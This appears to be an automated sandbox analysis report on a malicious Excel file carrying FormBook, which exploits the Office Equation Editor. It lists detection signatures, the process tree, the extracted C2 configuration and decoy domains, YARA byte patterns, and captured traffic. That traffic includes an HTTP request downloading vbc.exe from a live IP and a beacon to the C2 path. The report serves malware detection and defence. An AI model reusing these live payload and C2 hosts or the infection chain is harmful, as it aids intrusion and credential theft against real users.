Windows Analysis Report Sajeeb09908976745344567.xlsx

Overview

General Information

Sample Name: Sajeeb09908976745344567.xlsx
Analysis ID: 502271
MD5: ac493c2681477e3b56acbb570b8e41d9
SHA1: 2d9019b6c2f57c6360b155957cb542ae61bbf728
SHA256: 9efaa722d6e9df7c6628df6d1f49d14d858b60782db11c3f1e9b5037803b290b
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 284 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2540 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1292 cmdline: 'C:\Users\Public\vbc.exe' MD5: 0031A23B4BB6ABCDCCC5F8122DE5FCB5)
      • vbc.exe (PID: 2072 cmdline: 'C:\Users\Public\vbc.exe' MD5: 0031A23B4BB6ABCDCCC5F8122DE5FCB5)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • netsh.exe (PID: 1864 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: 784A50A6A09C25F011C3143DDD68E729)
            • cmd.exe (PID: 2544 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.naplesconciergerealty.com/mxnu/"], "decoy": ["insightmyhome.com", "gabriellamaxey.com", "029atk.xyz", "marshconstructions.com", "technichoffghosts.com", "blue-ivy-boutique-au.com", "1sunsetgroup.com", "elfkuhnispb.store", "caoliudh.club", "verifiedpaypal.net", "jellyice-tr.com", "gatescres.com", "bloomberq.online", "crystaltopagent.net", "uggs-line.com", "ecommerceplatform.xyz", "historyofcambridge.com", "sattaking-gaziabad.xyz", "digisor.com", "beachpawsmobilegrooming.com", "whitebot.xyz", "zacky6.online", "qlfa8gzk8f.com", "scottjasonfowler.com", "influxair.com", "desongli.com", "xn--w7uy63f0ne2sj.com", "pinup722bk.com", "haohuatour.com", "dharmathinkural.com", "hanjyu.com", "tbrhc.com", "clarityflux.com", "meltonandcompany.com", "revgeek.com", "onehigh.club", "closetu.com", "yama-nkok.com", "brandonhistoryandinfo.com", "funkidsroomdecor.com", "epilasyonmerkeziankara.com", "265411.com", "watch12.online", "dealsbonaza.com", "gold2guide.art", "tomclark.online", "877961.com", "washingtonboatrentals.com", "promovart.com", "megapollice.online", "taquerialoteria.com", "foxsontreeservice.com", "safebookkeeping.com", "theeducationwheel.online", "sasanos.com", "procurovariedades.com", "normandia.pro", "ingdalynnia.xyz", "campusguideconsulting.com", "ashramseries.com", "clubcupids.art", "mortgagerates.solutions", "deepscanlabs.com", "insulated-box.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
    • 0x16aa9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bbc:$sqlite3step: 68 34 1C 7B E1
    • 0x16ad8:$sqlite3text: 68 38 2A 90 C5
    • 0x16bfd:$sqlite3text: 68 38 2A 90 C5
    • 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
      • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Sigma Overview

      Exploits:

      Sigma detected: EQNEDT32.EXE connecting to internet
      Source: Network Connection, Author: Joe Security, Data: DestinationIp: 192.3.110.172, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2540, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
      Sigma detected: File Dropped By EQNEDT32EXE
      Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2540, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

      System Summary:

      Sigma detected: Droppers Exploiting CVE-2017-11882
      Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2540, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1292
      Sigma detected: Execution from Suspicious Folder
      Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2540, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1292

      Jbx Signature Overview

      AV Detection:

      Found malware configuration
      Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook (same configuration as shown under Malware Configuration above)
      Multi AV Scanner detection for submitted file
      Source: Sajeeb09908976745344567.xlsx, Virustotal: Detection: 29%
      Source: Sajeeb09908976745344567.xlsx, ReversingLabs: Detection: 21%
      Yara detected FormBook
      Source: Yara match, File source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY
      Antivirus detection for URL or domain
      Source: www.naplesconciergerealty.com/mxnu/, Avira URL Cloud: Label: malware
      Source: http://192.3.110.172/000900/vbc.exe, Avira URL Cloud: Label: malware
      Multi AV Scanner detection for domain / URL
      Source: www.naplesconciergerealty.com/mxnu/, Virustotal: Detection: 6%
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe, ReversingLabs: Detection: 36%
      Source: C:\Users\Public\vbc.exe, ReversingLabs: Detection: 36%
      Machine Learning detection for dropped file
      Source: C:\Users\Public\vbc.exe, Joe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe, Joe Sandbox ML: detected
      Source: 5.2.vbc.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
      Source: 8.2.netsh.exe.6d3da0.0.unpack, Avira: Label: TR/Patched.Ren.Gen
      Source: 4.2.vbc.exe.3030000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
      Source: 8.2.netsh.exe.2c6796c.4.unpack, Avira: Label: TR/Patched.Ren.Gen
      Source: 5.1.vbc.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

      Exploits:

      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
      Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: netsh.pdb source: vbc.exe, 00000005.00000002.556406324.0000000000553000.00000004.00000020.sdmp
      Source: Binary string: wntdll.pdb source: vbc.exe, netsh.exe
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_00405E93 FindFirstFileA,FindClose, 4_2_00405E93
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 4_2_004054BD
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_00402671 FindFirstFileA, 4_2_00402671
      Source: global traffic, DNS query: name: www.washingtonboatrentals.com
      Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop ebx, 5_2_00406AC1
      Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop edi, 5_2_0040C3E7
      Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop edi, 5_2_00415671
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 4x nop then pop ebx, 8_2_00086AC1
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 4x nop then pop edi, 8_2_0008C3E7
      Source: C:\Windows\SysWOW64\netsh.exe, Code function: 4x nop then pop edi, 8_2_00095671
      Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 192.3.110.172:80

      Networking:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exe, Network Connect: 3.64.163.50 80
      Source: C:\Windows\explorer.exe, Domain query: www.washingtonboatrentals.com
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractor, URLs: www.naplesconciergerealty.com/mxnu/
      Source: Joe Sandbox View, ASN Name: AMAZON-02US
      Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS
      Source: Joe Sandbox View, IP Address: 3.64.163.50
      Source: global traffic, HTTP traffic detected:
        HTTP/1.1 200 OK
        Date: Wed, 13 Oct 2021 17:03:16 GMT
        Server: Apache/2.4.50 (Win64) OpenSSL/1.1.1l PHP/8.0.11
        Last-Modified: Wed, 13 Oct 2021 06:08:09 GMT
        ETag: "46f39-5ce35c953b021"
        Accept-Ranges: bytes
        Content-Length: 290617
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/x-msdownload
      Source: global traffic, HTTP traffic detected:
        GET /000900/vbc.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 192.3.110.172
        Connection: Keep-Alive
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE98A654.emf
      Source: unknown, DNS traffic detected: queries for: www.washingtonboatrentals.com
      Source: global traffic, HTTP traffic detected:
        GET /mxnu/?0h=6lxhT6_0RrqDgXE0&bV8=5sVEEjOjrPj2idxjAkM9c91RRKirbtM3qCtWvXETAP1vtyCGbasEc4a0ZRfXFvjfhHczKQ== HTTP/1.1
        User-Agent: Windows Explorer
        Host: www.washingtonboatrentals.com
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_00404FC2

      E-Banking Fraud:

      Yara detected FormBook
      Source: Yara match, File source: the same ten memory regions listed under "Yara detected FormBook" in AV Detection above

      System Summary:

      Malicious sample detected (through community Yara rule)
      Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
      Source: Screenshot number: 4, Screenshot OCR: enable Editing and Content from the Yellow bar 18 above to view locked content. 19 20 0 " 21 22
      Office equation editor drops PE file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
      Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_004185B0 NtCreateFile
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_00418660 NtReadFile
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_004186E0 NtClose
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_00418790 NtAllocateVirtualMemory
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_009100C4 NtCreateFile,LdrInitializeThunk
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_00910048 NtProtectVirtualMemory,LdrInitializeThunk
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_00910078 NtResumeThread,LdrInitializeThunk
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_009107AC NtCreateMutant,LdrInitializeThunk
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090F9F0 NtClose,LdrInitializeThunk
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_0090F900 NtReadFile,LdrInitializeThunk
